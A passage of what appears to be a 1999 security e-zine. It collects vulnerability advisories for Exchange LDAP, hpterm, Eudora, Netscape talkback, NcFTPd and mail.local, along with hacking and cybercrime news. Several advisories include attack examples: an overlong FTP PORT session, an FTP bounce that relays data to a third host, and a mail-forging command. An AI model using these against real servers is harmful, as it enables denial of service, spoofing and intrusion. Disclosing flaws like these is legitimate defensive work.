what the uninstall programs call, when they launch, create your own and remove any you don't want. Watch what windows launches behind your back. (Edit/Remove/Insert) Change the layout of your Deskop, and some of it's features. Clear your history files when leaving Windows. Log logins at startup. Change your registration information. Forgot your password to Windows9x? Retrieve or remove the password files directly. Got a habit of forgetting stuff? The Wintrasher Calendar & Popup is with you every time you start Windows. Has your system ever crashed, or ever wished that you didn't install that program? The system backup feature backs up critical system files, including the Registry. Lock your system as with Windows NT with one click. Make sure you are the only one that can use Wintrasher at the station, by password-protecting WT-Gold. For Windows 95/98. 1.6 MB. By The Silents Denmark. Packetstorm download: http://www.genocide2600.com/~tattooman/utility-nt/wtgold.zip Main site: http://www.silents.dk/ 05.0 LDAP buffer overflow ~~~~~~~~~~~~~~~~~~~~~ From: X-Force To: BUGTRAQ@netspace.org Subject: ISS Security Advisory: LDAP Buffer overflow against Microsoft Directory Services Date: 1999. oujak 16 22:03 -----BEGIN PGP SIGNED MESSAGE----- ISS Security Advisory March 15, 1999 LDAP Buffer overflow against Microsoft Directory Services Synopsis: ISS X-Force has discovered a buffer overflow exploit against Microsoft Exchange's LDAP (Lightweight Directory Access Protocol) server which allows read access to the Exchange server directory by using an LDAP client. This buffer overflow consists of a malformed bind request that overflows the buffer and can execute arbitrary code. This attack can also cause the Exchange LDAP service to crash. This vulnerability exists in Microsoft Exchange Server version 5.5. Description: This exploit occurs during the LDAP binding process. Binding involves logging in or authenticating to a directory, and consists of sending a username, a password, and a binding method. There are two methods in which to use this vulnerablility against an Exchange server. The first consists of sending a particular type of invalid LDAP bind packet which will cause an overflow to occur this will cause the LDAP service to crash. The second uses a large malformed LDAP bind packet that is carefully crafted to take advantage of the buffer overflow and can be used to execute arbitrary code. Recommendations: Microsoft has made a patch available for the LDAP attack. Patch information is available at: http://www.microsoft.com/security/bulletins/ms99-009.asp Network administrators can protect internal systems from external attack by adding a rule to a filtering router or firewall of the type: Deny all incoming TCP packets with a destination port of 389. Many firewalls or packet filters may already have more restrictive rulesets that already encompass this filtering rule, in which case the network is already protected from an external attack. This ruleset would include filtering all incoming traffic to TCP port 389. Additional Information: These vulnerabilities were primarily researched by the ISS X-Force. ________ Copyright (c) 1999 by Internet Security Systems, Inc. Permission is hereby granted for the electronic redistribution of this Security Advisory. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Security Advisory in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Internet Security Systems, Inc. (ISS) is the leading provider of adaptive network security monitoring, detection, and response software that protects the security and integrity of enterprise information systems. By dynamically detecting and responding to security vulnerabilities and threats inherent in open systems, ISS's SAFEsuite family of products provide protection across the enterprise, including the Internet, extranets, and internal networks, from attacks, misuse, and security policy violations. ISS has delivered its adaptive network security solutions to organizations worldwide, including firms in the Global 2000, nine of the ten largest U.S. commercial banks, and over 35 governmental agencies. For more information, call ISS at 678-443-6000 or 800-776-2362 or visit the ISS Web site at http://www.iss.net. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as well as on MIT's PGP key server and PGP.com's key server. X-Force Vulnerability and Threat Database: http://www.iss.net/xforce Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBNu3GuzRfJiV99eG9AQF48wP+J1/vW040sA5f9Nz56JEF9s6d/tpainG1 Qw7Jxbry374IFinJZfk/K5FJkdbjJfMcyGfgWJjNriYZJ0EKFkQcRK7XNAUe8AGu LWaBW4l0v1Qox3ueR3GdCskQ8haK9vpxkFkbPmlefIWKMsVhncQPloJwU3/WyPNV uLJBWqHEpkU= =Zp+/ -----END PGP SIGNATURE----- From Help Net Security http://net-security.org/ PATCH FOR "MALFORMED BIND REQUEST" by BHZ, Wednesday 17th Mar 1999 on 8:40 pm CET Microsoft has released a patch that eliminates a vulnerability in the LDAP Bind function for Microsoft (r) Exchange (r) 5.5. The vulnerability could allow denial of service attacks against an Exchange server or, under certain conditions, could allow arbitrary code to be run on the server. A fully supported patch is available, and Microsoft recommends that customers who are at risk from this attack download and install it. You can obtain patch for X86-based Exchange or Alpha-based Exchange @HWA 06.0 HP Security bulletin: HPTerm exploitability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 18 Mar 1999 12:36:13 -0800 From: aleph1@UNDERGROUND.ORG Reply-To: support_feedback@us-support.external.hp.com To: BUGTRAQ@netspace.org Subject: Security Bulletins Digest HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://us-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== ? Digest Name: Daily Security Bulletins Digest Created: Thu Mar 18 3:00:02 PST 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9903-093 Security Vulnerability with hpterm on HP-UX 10.20 The documents are listed below. ------------------------------------------------------------------------------- ? Document ID: HPSBUX9903-093 Date Loaded: 19990317 Title: Security Vulnerability with hpterm on HP-UX 10.20 ------------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: PHSS_13560 introduced a library access problem into hpterm. PLATFORM: HP9000 Series 700 and Series 800, HP-UX release 10.20 only. DAMAGE: Users can gain increased privileges. SOLUTION: Install PHSS_17830. AVAILABILITY: The patch is available now. ------------------------------------------------------------------------- I. A. Background PHSS_13560 introduced a library access problem into hpterm, the terminal emulator for the X Window system. (See hpterm(1)). B. Fixing the problem Installing patch PHSS_17830 completely fixes this problem. NOTE: Three older hpterm patches have been released including PHSS_13560, PHSS_15431, and PHSS_17332. All of these older patches are being superseded with the release of the PHSS_17830. Do not use PHSS_13560, PHSS_15431, or PHSS_17332. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following: Use your browser to get to the HP Electronic Support Center page at: http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review- bulletins already released from the main Menu, click on the "Technical Knowledge Database (Security Bulletins only)". Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. _______________________________________________________________________ -----End of Document ID: HPSBUX9903-093-------------------------------------- @HWA 07.0 Eudora buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from enext.dyndns.org (port25.mico10.tir.com [216.40.137.210]) by netspace.org (8.8.7/8.8.7) with ESMTP id CAA18560 for ; Sat, 20 Mar 1999 02:17:38 -0500 Received: from localhost (whiz@localhost) by enext.dyndns.org (8.8.7/8.8.7) with ESMTP id CAA12075 for ; Sat, 20 Mar 1999 02:21:35 -0500 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Sat, 20 Mar 1999 02:21:35 -0500 Reply-To: whiz Sender: Bugtraq List From: whiz Subject: Eudora Attachment Buffer Overflow To: BUGTRAQ@netspace.org I have found another problem with Eudora, attachments, and long filenames that is similar to the the problem I found last year. If two messages are sent to an Eudora 4.1 user that have an attachment with a filename of around 231 or more, the next time the user checkes his mail Eudora crashes. I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters + 231 = 262 = longer then Windows can handle. Eudora trucates the long filename correctly and thats why you cant't send just one messages with a long name, like you use to be able to do with Eudora 4.0. But it truncates it so the the path length is 259 characters which is the maximum. Then when it receives the second attachment it truncates, and trys to add a 1 to the end, this is where it crashes. This allows you to modify the return address to point to arbitrary code. Here is how i tested: Send message to myself with attchment that has a long filename Resend exact message Check my mail Eudora crashes Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are affected. The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99. -whiz whiz@enext.dyndns.org http://enext.dyndns.org/~whiz/ @HWA 08.0 Netscape SUSE crash exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Approved-By: aleph1@UNDERGROUND.ORG Date: Fri, 19 Mar 1999 22:45:02 -0800 Reply-To: Aleph One Sender: Bugtraq List From: Aleph One Subject: Security hole in Netscape Communicator's 4.5 "talkback" function To: BUGTRAQ@netspace.org ______________________________________________________________________________ SuSE Security Announcement Package: netscape-4.5-9 Date: Thu Mar 18 10:22:11 CET 1999 Affected: unix operating systems using netscape communicator 4.5 ______________________________________________________________________________ A security whole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note, that that we provide this information on as "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. ______________________________________________________________________________ 1. Problem Description The Netscape Communicator 4.5 comes with "talkback", a quality enhancement tool by Fullcircle (www.fullcircle.com). If the communicator crashs for any reason, the file with the name /tmp/.$UID.talkback is read in, and the pid in this file is killed. After that, the file is truncated/created without checks for {sym|hard}links and the pid of the current talkback process is written into the file. 2. Impact Anyone on the system can kill a process of users if their communicator crashs. Anyone on the system can overwrite/create any file an attacked users# has write access to. We didn't check if there's a buffer overflow possible when the talkback application reads in the file. 3. Solution Disable talkback. You may do this my executing the following commands (your path to netscape may differ): /bin/mv /opt/netscape/talkback /opt/netscape/talkback.disable /bin/chmod -R 600 /opt/netscape/talkback Netscape responded to this vulnerability that the current version does not install the talkback application. You may install the new version 4.51 from Netscape which also fixes some other security vulnerabilities. However, if you update from a 4.5 installation, ensure that you execute the lines above. ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe, send an email to majordomo@suse.com with the text subscribe suse-security or subscribe suse-security-announce in the body of the message. Or just issue a echo subscribe suse-security | mail majordomo@suse.com or echo subscribe suse-security-announce | mail majordomo@suse.com ______________________________________________________________________________ If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality. ______________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i -----END PGP PUBLIC KEY BLOCK----- @HWA 09.0 Hotmail to plug potential security problem ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HOTMAIL BUG by BHZ, Sunday 21th Mar 1999 on 3:01 am CET The security hole, that Hotmail plans to plug, could make users who access Hotmail through a public terminal or other shared computer vulnerable to the prying eyes of subsequent users. Hotmail said it had caught the security problem during a routine security audit and was close to implementing its fix, which is to stop authentication by IP address and require the use of cookies. The service noted that users currently can protect themselves against the exploit by opting for cookie-based authentication. Contributed by Thejian. @HWA 10.0 NcFTPd Exploit (old but missed in earlier issues) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This advisory is from Proof Of Concept Proof of Concept - Security Advisory 02/23/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program NcFTPd Description FTP server (commercial) Severity Theoretical root compromise, logs compromise Synopsis: NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. This was tested on Linux with libc5 (there's a glibc2 specific version available). Problem: NcFTPd's PORT parsing function has a stack buffer overflow problem, which would basically allow a user to remotely execute arbitrary code - the thing here is that the PORT parsing function seem to change characters, that are not in the range 0x30-0x39 (ASCII '0'-'9'), into 0x20 (ASCII space), hence making an exploit almost impossible (note that, if ascii 0x40 would be allowed that would be a different story =p). The program only parses for characters out of the 0-9 range in a specific area in memory (the one that contains return address heh) - the rest is kept unchanged, and you can't really go further in memory, input line size is restricted. Like with most buffer overflows there are probably work-arounds to exploit it - this could have been a particulary neat exploit, since it runs as a child and one could gain access transparently without crashing the parent. The current bug is not really a problem, it can crash the child process with a segfault, the parent process receives a signal 6 (abort) and the child process stay zombie for a few seconds and a brand new one is created. A few minor DoS attacks are possible but, who cares. Oh and this could be used to not get listed in the logs too. Example: -- evil:$ nc victim ftp 220 victim NcFTPd Server (unregistered copy) ready. user anonymous 331 Guest login ok, send your complete e-mail address as password. pass some@thing 230-You are user #1 of 50 simultaneous users allowed. 230- 230 Logged in anonymously. port 00000000000000000000000000000000000000000000 (...) 501 Syntax error in parameters. evil:$ -- Status: I contacted the authors, nice enough to send me back the piece of code that causes the problem - here goes: static int ftp_aton(const char *cp, struct sockaddr_in *sinaddr) { char buf[64]; char *dst; char *dstlim; int i, c; unsigned int octets[6], u; memset(sinaddr, 0, sizeof(struct sockaddr_in)); dst = buf; dstlim = dst + sizeof(buf); for ( ; ; ) { c = *cp++; if (c == '\0') break; if (! isdigit(c)) c = ' '; if (dst < dstlim) *dst++ = c; } *dst = '\0'; if (sscanf(buf, "%u%u%u%u%u%u", &octets[0], &octets[1], &octets[2], &octets[3], &octets[4], &octets[5] ) != 6) { return (-1); } for (i=0; i<6; i++) { if (octets[i] > 0xFF) return (-1); } sinaddr->sin_family = AF_INET; u = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | (octets[3]); sinaddr->sin_addr.s_addr = htonl(u); u = (octets[4] << 8) | (octets[5]); sinaddr->sin_port = htons((unsigned short) u); return (0); } /* ftp_aton */ void Port(char *line) { if (gLoggedIn == 0) { NotLoggedIn(); return; } if (gAllowPORT == 0) { Reply("550 This site does not permit PORT. Please use PASV instead.\r\n"); return; } if (ftp_aton(line, &gRemoteDataAddr) < 0) { Reply("501 Syntax error in parameters.\r\n"); return; } /* ... */ } @HWA 10.1 NcFTPd proxy exploitation ~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept - Security Advisory 02/16/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program NcFTPd Description FTP server (commercial) Severity Default PORT setup, log compromise Synopsis: NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. This was tested on Linux with libc5 (there's a glibc2 specific version available). Overview: To initiate a FTP transfer, there must be two connections, one control connection (server's ftp port), and one data connection. When a client wants to tell the server where to send the data (ie. a file you want to download, or a directory listing), it must use the command PORT - in which the destination address and port is specified. Problem: NcFTPd does not check that the destination PORT address is the user's IP. This means anybody can transmit data from the server anywhere, anonymously. Obviously this can lead to potential `easy' DoS attacks and spoofing (say, someone uploads a file containing commands of something to incoming, PORT to some host/port, and use RETR (retrieve file)). Such connections are possible with the default NcFTPd configuration, but can be disallowed: general.cf> allow-outgoing-proxy-data-connection-ports-below-1024 - no general.cf> allow-proxy-connections - no Most other FTP server daemons I've tried has this feature disabled - even if the proxy connections are a documented part of RFC 959 (FTP protocol). But this is no big deal, just a possible amelioration. I made an example program that listens on a port and dumps arbitrary received data in string, hex or ascii/hex format, and sends back EOF (needed for FTP data transfer). [http://poc.csoft.net/code/listerine/listerine.tar.gz] Example: evil:$ telnet victim ftp # victim runs NcFTPd user anonymous # anonymous is up by default pass some@thing port 192,168,0,1,5,131 # connect on port 1411 retr incoming/stuff # send arbitrary data, as it # was coming from host victim. To see for yourself, you can run my example program `listerine', on the host victim. I tested this on my LAN and on remote machines too. Status: Got response from authors, the problem can be fixed indeed with the general.cf options mentionned above, but are not enabled with default configuration. .sw3 @HWA 10.2 Mail.local sendmail exploit advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept - Security Mini-advisory 02/15/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program mail.local (Berkeley Sendmail) Description Local mailer (forward mail to mailboxes) Severity Mailbox compromise Synopsis: mail.local is a small program distributed with Berkeley Sendmail, used as a local mailer (forwards mail to mailboxes), also able to handle LMTP commands. It runs SUID root in order to access the users's mailbox (ie. /var/spool/mail, /usr/spool/mail). Overview: When mail has to be written to a user's mailbox locally, a local mailer is used; the mail.local program that comes with Sendmail does this task, but does not restrict the length of a message, or does not check the authenticity of the user who sends it. This is obviously not a big security issue - but still, it has to get fixed, as this could lead to more serious problem if used on a system with lots of e-mail accounts. Problem: This can lead to the compromising of anybody's mailbox - from fake (and totally untraceable messages), to flooding the mailbox (and maybe the hard drive). I found this by inspecting the source code for buffer overflows heh. Say I wanted to send a fake message like it was coming from root to user joe, simply running mail.local -f root joe could do it. mail.local simply dumps the message as you enter it in the user's maibox. Since mail.local does not checks for message length, you can flood a mailbox (and possibly the hard drive) in a matter of seconds. Finally, mail.local only check if a user exists by using /etc/passwd, that means anybody could create mailboxes for users like bin, nobody, etc (usually it's no security compromise). Examples: [http://poc.csoft.net/advs/mail.local/mailfrm.tar.gz] [http://poc.csoft.net/advs/mail.local/junk.tar.gz] Patch/Fix: [http://poc.csoft.net/advs/mail.local/mail.local.diff] Status: As of 02/22/99, I received a e-mail from the authors, the program should be shipped non-setuid in 8.10. .sw3 @HWA 11.0 Its in the bag, the great hacker backpack caper... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I really debated giving this any space at all but it is pertinent to the mainstream ideals that are being generated by the media so its here.... *sigh* - Ed March 24th 1999 via wired news Hackers Sack Competition Site by Leander Kahney 5:00 p.m. 23.Mar.99.PST Having baited crackers with a "hacking" competition to win a backpack, a retailer's site has been hacked for real. As previously reported, a Belgian bag manufacturer is giving a "Hacker" branded backpack to everyone that cracks a password competition on its Web site. But on Tuesday Kipling's site was hacked for real. The opening page was replaced with a screen grab that showed a big red cross and the message: "Sorry, we've been hacked.... Site under reconstruction." The altered page stayed up for most of Tuesday, and Kipling was unavailable for comment. The site intrusion may have been retaliation for disparaging remarks made about crackers by a Kipling vice president. Shortly before the site was hacked, the password competition was finally cracked. It took a week of trying, claimed Mooby, a hacker who organized a brute force method of using software to generate all possible combinations. The crackers' efforts finally paid off over the weekend, Mooby said in an email. Ironically, the password wasn't cracked by software, but obtained by a more traditional method -- weaseling it out of someone. "It's a pity that I can't tell how I got the final password/login," he wrote. "We never would have guessed [it]. Let's just say I used some of my nerd-heroic social skills to get the right things." Having obtained the password, Mooby shared it. "I hope Kipling sends me this backpack," he wrote, "and all the other 99 people I told the password." -=- -=- Date: Sat, 20 Mar 1999 05:20:50 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] Retailer Frustrates Hackers http://www.wired.com/news/news/culture/story/18616.html Retailer Frustrates Hackers by Leander Kahney 3:00 a.m. 20.Mar.99.PST Promoting a new line of backpacks aimed at "hackers," a European bag manufacturer is running a crack-the-password competition on its Web site. But to the fury of hackers trying to bypass the competition and crack the site in earnest, all attempts to date have been unsuccessful. According to an amusing line of posts to Slashdot, an information clearinghouse for computer nerds, the hackers reveal their mounting frustration at being unable to thwart the password competition. "Come on!" wrote one. "Out of the 10,000 people who have read this article, no one has found the username and password? I find that very hard to believe. It has to be something completely insanely easy, right?" Apparently not. The "crack and win" password competition is organized by Kipling, a manufacturer of travel bags, backpacks, and accessories based in Antwerp, Belgium. The competition promotes its Hacker line of bags and backpacks, which have names like bookmark, mailbomb, browser, spam, firewall, and download. "The game challenges every pirate out there to break into our security and win a Hacker bag," the company said in a press release. "You can find the code in two ways," the release continued. "Real computer freaks will find the information in the traditional hacker manner. Those with less hacking experience can follow the hints which appear on the screen, which refer surfers to a Kipling sales point. Those who remain alert will surely find the letter/number code." Kipling confirmed it would give a bag to everyone who cracks the code, which takes the form of a username login and password. Rising to the challenge, readers of Slashdot quickly encouraged each other to break the code, just for the hell of it. But after a week of trying, most efforts have been abandoned. "I'm sorry to say that so far no one has been able to beat the login," said Slashdot contributor Greg Boyce, who offered to buy a Slashdot hat for the first person to crack it. "Turns out it was a bit more complicated than I thought it would be." The most ambitious attempt adopted a "brute force" strategy generating all possible combinations of username and password. Special software to automate the process is available on the Web. Other attempts ranged from examining the source code for the Web page, which is coded in Javascript, to breaking into the site. However, Kipling said attempts to breach the site's security have so far failed. "No one has cracked it," said Edith Iris, Kipling's marketing manager. "We've had no problems." To add to the hackers' irritation, Kipling also garbled the definitions of cherished computer terms in its marketing blurb. According to Kipling's site, "A hacker is a cunning computer expert who cracks the security systems of computers in order to steal or destroy information." But in the programming community, a malicious computer expert is called a "cracker." A hacker is simply a harmless programmer. "Hacker is the term in common parlance," countered Larry Lein, executive vice president of Kipling USA. "If you asked me what a cracker was, I'd say someone who lived in a trailer park down South." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 12.0 DNS Spoofing finally resolved? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 20 Mar 1999 22:08:46 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] bind with DNSSEC finally released Sender: owner-isn@repsec.com Originally From: Lucky Green Originally To: cypherpunks@algebra.com Seems bind 8.2 with the long-awaited secure DNS fully integrated has finally been released. Say goodbye to DNS spoofing. Since the included crypto is meant to be used for authentication only and the licensing agreement prohibits the use of the said crypto for non-authentication purposes, the distribution is freely exportable. :-) Install bind 8.2 on your DNS server today and permanently fix one of the largest and longest-standing security holes on the Internet. ftp://ftp.isc.org/isc/bind/src/8.2/ --Lucky Green PGP 5.x encrypted email preferred -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 13.0 [ISN] IETF working group seeks to improve security alerting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 18 Mar 1999 00:33:31 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] IETF working group seeks to improve security alerting Forwarded From: darek milewski http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/1999/0316security.html Sound the alarm! IETF working group seeks to improve security alerting. By Sandra Gittlen Network World Fusion, 03/16/99 MINNEAPOLIS - An IETF working group has stepped up work on a protocol for broadcasting alerts of network breaches across proprietary security applications. The Intrusion Detection Message Exchange Protocol (IDMEP) would let applications - and system managers - quickly share information about attacks, according to IDMEP working group members. They are meeting here as part of an overall IETF conference. "[IDMEP] will be useful for attacks launched from one domain to another," says working group attendee Brian Tung, a computer scientist at the University of Southern California's Information Sciences Institute. "If a source domain notices an attack, it can notify the destination network. Right now, that's done by a human." The group had met last year at the IETF meeting in Orlando, but was unsuccessful in gaining consensus and had to revamp its plans. This time, meeting attendees seemed encouraged by the group's efforts. With the protocol, which could be based on SNMP Version 3, an alert detailing the type of attack in progress will be automatically sent across the network, along with a reference, such as a URL or a system file, where the network manager can find further information. That information could be the threshold setting of the alerter's system letting the recipient know what the alerter considers an attack or what the alerter suggests as a response for such an attack. Mark Wood, product line manager at Internet Security Systems in Atlanta, says IDMEP could dramatically improve responses to attacks because networks will be sharing information, not duplicating efforts. In fact, Tung says that hooking the IDMEP to policy networks could let users set up automatic responses to alerts and, therefore, ward them off. "There are a number of dollars to be had in [the intrusion detection tools] market," says Stuart Staniford-Chen, co-chair of the working group. In fact, the projected market for intrusion detection tools is expected to be $200 million, according to analysts at the Aberdeen Group, a Boston consultancy. "Therefore, we need to get moving on this [protocol]." Wood says he expects the protocol to be completed by the middle of next year, but products based on a proposed standard could be released as early as the first quarter of next year. Cisco and Axent are also working on the protocol. @HWA 14.0 Report: Military computers vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.usatoday.com/life/cyber/tech/cte684.htm Report: Military computers vulnerable WASHINGTON (AP) - The military's key communications infrastructure linking combat, intelligence and command forces is dangerously vulnerable to attacks from cyberspace and requires urgent changes in Defense Department policy, said a study released Monday. The Command, Control, Communications, Computers and Intelligence systems, known as C4I, is compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, the National Research Council reported. ''The rate at which information systems are being relied on outstrips the rate at which they are being protected,'' it said. ''The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack.'' Despite evidence of security lapses in C4I -- which handles communications and warning tasks all along the chain of command -- the Pentagon's ''words regarding the importance of information systems security have not been matched by comparable action,'' the report said. ''Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense,'' said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government. The report indicated the problems were due more to the Pentagon's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress. In a statement, the Pentagon acknowledged that the U.S. military's strength ''is our information technology,'' and that ''our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well.'' It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel. But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of ''Industrial Age'' military acquisition policies -- applying to computers as well as tanks, ships and aircraft -- that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system. ''Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again,'' said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. The report recommended: Making C4I a greater budget priority in defense spending, with a flexibility that can ''exploit unanticipated advances in C4I technology.'' Designating an organization responsible for providing direct defensive operational support to commanders. Funding a program to conduct frequent, unannounced penetration testing of C4I systems. Ensuring that programs are operable even if one part has been penetrated by an adversary. Emphasizing the importance of information technology in the military leadership. Establishing an Institute for Military Information Technology, possibly as part of an existing body. ------------------------------------------------------------ -------------------- ShadowVrai http://shadowvrai.evil.nu ______________________ "Did you really think you could call up the devil and ask him to behave?" __________ _____________________________________________ Get your free personalized email address at http://www.MyOwnEmail.com @HWA 15.0 International raid cracks child porn ring ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9903/19/germany.porno.reut/index.html International raid cracks child porn ring March 19, 1999 Web posted at: 5:35 p.m. EST (2235 GMT) MUNICH (Reuters) -- German police said on Friday they had cracked an international Internet child pornography ring after launching a coordinated sweep through seven countries. In a raid of private homes coordinated from Munich, German police said they had confiscated thousands of outlawed photographs and video images which had been traded and distributed via Internet "chat rooms." German police said the action, codenamed "Bavaria," had taken place on Wednesday and involved simultaneous raids of suspects' homes in Germany, Switzerland, Sweden, Britain, Norway, the United States and Canada. Holger Kind, an official from the Federal Crime Office, said the material uncovered had been the widest sweep of its kind led from Germany. "You can assume this will not be the last raid of its kind," Kind told a news conference. Kind said some suspects had already confessed to involvement in the ring. If convicted in Germany, the suspects could face a prison sentence of up to five years in jail. Switzerland and Britain have arrested one suspect each. Police in Sweden and the United States also found banned material in the raids featuring children between the ages of three and four, police in Bavaria said. @HWA 15.1 ACPM : Anti-Child Porn Militia wants YOU ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Anti Child Porn Militia contributed by system.administrator The Anti Child Porn Militia is recruiting new members. They are asking for anyone who thinks they can be of assistance in eliminating child pornography from the internet to assist them. http://infovlad.net/ACPM/ From the ACPM site; We pray for children who are sick. children who may not live to see their next birthday.... or tomorrow, children who go into hospitals, never to come out children who don't deserve to die. We pray for the children that don't understand why...... why they're not like other children who are healthy children who play in the sunlight dance on the grass, children who enjoy life children that don't think about death. We pray for children who stare at photographers from behind barbed wire, who can't run down the street in a new pair of sneakers, who are born in places we wouldn't be caught dead in, who live in an X-rated world. We pray for those children who never get dessert, who have no security blanket to drag behind them, children who watch their parents watch them die. children who can't find any bread to steal, children who don't have any rooms to clean up, whose pictures aren't on anybody's dresser, whose monsters are real. We pray for children whose nightmares come in the daytime, children who will eat anything, who have never seen a dentist, who aren't spoiled by anybody, children who go to bed hungry and cry themselves to sleep. who live and move but have no being. We pray for children who want to be carried, and for those who must be. For those who never get a second chance. We pray for those children who will grab the hand of anybody kind enough to offer it. For these children we pray. - unknown - 'Hackers wanted:' http://infovlad.net/ACPM/signup.html Only sign up if you have some skills and time to help out don't sign up for bragging rights, you won't be doing anyone any favours... - Ed @HWA 16.0 Hacking contest, win a Netfinity server! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking Contest from HNN contributed by ju PC Intern, a german Computer magazine is 